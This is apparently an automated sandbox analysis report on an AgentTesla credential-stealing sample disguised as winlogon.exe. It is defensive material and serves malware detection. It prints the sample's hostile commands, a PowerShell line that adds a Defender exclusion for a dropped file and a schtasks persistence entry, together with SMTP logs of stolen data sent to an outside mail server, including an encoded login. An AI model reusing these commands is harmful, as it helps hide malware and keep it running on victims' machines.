                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000x72ecc0x73000False0.893866762908data7.82547153814IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x760000x5140x600False0.3828125data3.82946279488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x780000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_VERSION0x760900x284data
                                                                        RT_MANIFEST0x763240x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Version Infos

                                                                        DescriptionData
                                                                        Translation0x0000 0x04b0
                                                                        LegalCopyright
                                                                        Assembly Version0.0.0.0
                                                                        InternalNameCancellationCallbackIn.exe
                                                                        FileVersion0.0.0.0
                                                                        ProductVersion0.0.0.0
                                                                        FileDescription
                                                                        OriginalFilenameCancellationCallbackIn.exe

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        12/02/21-20:23:48.879737TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49843587192.168.2.4208.91.199.224

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 2, 2021 20:23:47.537733078 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:47.687623024 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:47.690627098 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:47.924026012 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:47.924518108 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:48.074357986 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:48.074382067 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:48.075438023 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:48.226380110 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:48.226877928 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:48.378978014 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:48.379654884 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:48.530858040 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:48.531563044 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:48.721369982 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:48.727202892 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:48.727817059 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:48.877969027 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:48.878220081 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:48.879736900 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:48.879857063 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:48.880605936 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:48.880714893 CET49843587192.168.2.4208.91.199.224
                                                                        Dec 2, 2021 20:23:49.029740095 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:49.030546904 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:49.086833000 CET58749843208.91.199.224192.168.2.4
                                                                        Dec 2, 2021 20:23:49.137166977 CET49843587192.168.2.4208.91.199.224

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 2, 2021 20:23:47.315831900 CET5172653192.168.2.48.8.8.8
                                                                        Dec 2, 2021 20:23:47.468144894 CET53517268.8.8.8192.168.2.4
                                                                        Dec 2, 2021 20:23:47.502657890 CET5679453192.168.2.48.8.8.8
                                                                        Dec 2, 2021 20:23:47.522454023 CET53567948.8.8.8192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Dec 2, 2021 20:23:47.315831900 CET192.168.2.48.8.8.80xd9faStandard query (0)smtp.stockmeieir.comA (IP address)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.502657890 CET192.168.2.48.8.8.80x53fbStandard query (0)smtp.stockmeieir.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Dec 2, 2021 20:23:47.468144894 CET8.8.8.8192.168.2.40xd9faNo error (0)smtp.stockmeieir.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.468144894 CET8.8.8.8192.168.2.40xd9faNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.468144894 CET8.8.8.8192.168.2.40xd9faNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.468144894 CET8.8.8.8192.168.2.40xd9faNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.468144894 CET8.8.8.8192.168.2.40xd9faNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.522454023 CET8.8.8.8192.168.2.40x53fbNo error (0)smtp.stockmeieir.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.522454023 CET8.8.8.8192.168.2.40x53fbNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.522454023 CET8.8.8.8192.168.2.40x53fbNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.522454023 CET8.8.8.8192.168.2.40x53fbNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                        Dec 2, 2021 20:23:47.522454023 CET8.8.8.8192.168.2.40x53fbNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)

                                                                        SMTP Packets

                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                        Dec 2, 2021 20:23:47.924026012 CET58749843208.91.199.224192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                        Dec 2, 2021 20:23:47.924518108 CET49843587192.168.2.4208.91.199.224EHLO 506013
                                                                        Dec 2, 2021 20:23:48.074382067 CET58749843208.91.199.224192.168.2.4250-us2.outbound.mailhostbox.com
                                                                        250-PIPELINING
                                                                        250-SIZE 41648128
                                                                        250-VRFY
                                                                        250-ETRN
                                                                        250-STARTTLS
                                                                        250-AUTH PLAIN LOGIN
                                                                        250-AUTH=PLAIN LOGIN
                                                                        250-ENHANCEDSTATUSCODES
                                                                        250-8BITMIME
                                                                        250 DSN
                                                                        Dec 2, 2021 20:23:48.075438023 CET49843587192.168.2.4208.91.199.224AUTH login bS5tZWxlbmRlekBzdG9ja21laWVpci5jb20=
                                                                        Dec 2, 2021 20:23:48.226380110 CET58749843208.91.199.224192.168.2.4334 UGFzc3dvcmQ6
                                                                        Dec 2, 2021 20:23:48.378978014 CET58749843208.91.199.224192.168.2.4235 2.7.0 Authentication successful
                                                                        Dec 2, 2021 20:23:48.379654884 CET49843587192.168.2.4208.91.199.224MAIL FROM:<m.melendez@stockmeieir.com>
                                                                        Dec 2, 2021 20:23:48.530858040 CET58749843208.91.199.224192.168.2.4250 2.1.0 Ok
                                                                        Dec 2, 2021 20:23:48.531563044 CET49843587192.168.2.4208.91.199.224RCPT TO:<m.melendez@stockmeieir.com>
                                                                        Dec 2, 2021 20:23:48.727202892 CET58749843208.91.199.224192.168.2.4250 2.1.5 Ok
                                                                        Dec 2, 2021 20:23:48.727817059 CET49843587192.168.2.4208.91.199.224DATA
                                                                        Dec 2, 2021 20:23:48.878220081 CET58749843208.91.199.224192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                        Dec 2, 2021 20:23:48.880714893 CET49843587192.168.2.4208.91.199.224.
                                                                        Dec 2, 2021 20:23:49.086833000 CET58749843208.91.199.224192.168.2.4250 2.0.0 Ok: queued as 9D30E2C7C12

                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: winlogon.exe PID: 6768 Parent PID: 6000

                                                                        General

                                                                        Start time:20:22:06
                                                                        Start date:02/12/2021
                                                                        Path:C:\Users\user\Desktop\winlogon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\winlogon.exe"
                                                                        Imagebase:0x7d0000
                                                                        File size:473600 bytes
                                                                        MD5 hash:629F5BB8B5EE75E90C393AD9D96A1772
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.678289324.0000000003BD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Analysis Process: powershell.exe PID: 6968 Parent PID: 6768

                                                                        General

                                                                        Start time:20:22:09
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UlhpAjSuVoTa.exe
                                                                        Imagebase:0xa40000
                                                                        File size:430592 bytes
                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 6584 Parent PID: 6968

                                                                        General

                                                                        Start time:20:22:10
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: schtasks.exe PID: 6632 Parent PID: 6768

                                                                        General

                                                                        Start time:20:22:10
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                                                                        Imagebase:0x150000
                                                                        File size:185856 bytes
                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 5644 Parent PID: 6632

                                                                        General

                                                                        Start time:20:22:11
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: RegSvcs.exe PID: 6284 Parent PID: 6768

                                                                        General

                                                                        Start time:20:22:12
                                                                        Start date:02/12/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Imagebase:0x620000
                                                                        File size:45152 bytes
                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.673745105.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.929063872.0000000002901000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.928192822.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.672598413.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.672988393.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.672988393.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.929157483.00000000029B4000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.673339643.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.673339643.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >